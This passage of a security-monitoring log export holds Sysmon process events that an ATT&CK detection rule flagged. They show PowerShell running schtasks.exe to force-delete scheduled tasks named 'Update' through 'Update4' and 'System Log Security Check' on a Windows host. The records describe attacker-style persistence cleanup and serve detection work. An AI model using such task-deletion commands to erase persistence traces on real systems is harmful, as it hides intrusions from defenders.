Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.286",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.982 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001096f62e00} +ProcessId: 7352 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update4 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.985168900Z"",""eventRecordID"":""3563"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.982\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001096f62e00}\r\nProcessId: 7352\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update4 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:07.982"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001096f62e00}"",""processId"":""7352"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update4 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.282",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.933 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001091f42e00} +ProcessId: 7372 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: 
Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.938816900Z"",""eventRecordID"":""3562"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.933\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-001091f42e00}\r\nProcessId: 7372\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.933"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-001091f42e00}"",""processId"":""7372"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.237",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.876 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00106cf22e00} +ProcessId: 6672 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN Update2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.879480100Z"",""eventRecordID"":""3561"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.876\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00106cf22e00}\r\nProcessId: 6672\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.876"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00106cf22e00}"",""processId"":""6672"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:36.221",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.825 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107df02e00} +ProcessId: 7452 +Image: C:\Windows\System32\schtasks.exe 
+FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.830609400Z"",""eventRecordID"":""3560"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.825\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00107df02e00}\r\nProcessId: 7452\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update1 
/F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.825"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00107df02e00}"",""processId"":""7452"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:20:35.550",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.784 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00108dee2e00} +ProcessId: 7136 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.786882700Z"",""eventRecordID"":""3559"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.784\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-00108dee2e00}\r\nProcessId: 7136\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 
(WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Update /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.784"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-00108dee2e00}"",""processId"":""7136"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Update /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:35.530",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:07.736 +ProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010aaec2e00} +ProcessId: 7340 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""System Log Security Check"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:07.754918500Z"",""eventRecordID"":""3558"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:07.736\r\nProcessGuid: {df9fc3d3-b3f7-5ecf-0000-0010aaec2e00}\r\nProcessId: 7340\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""System Log Security Check\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:07.736"",""processGuid"":""{df9fc3d3-b3f7-5ecf-0000-0010aaec2e00}"",""processId"":""7340"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler 
Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""System Log Security Check\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 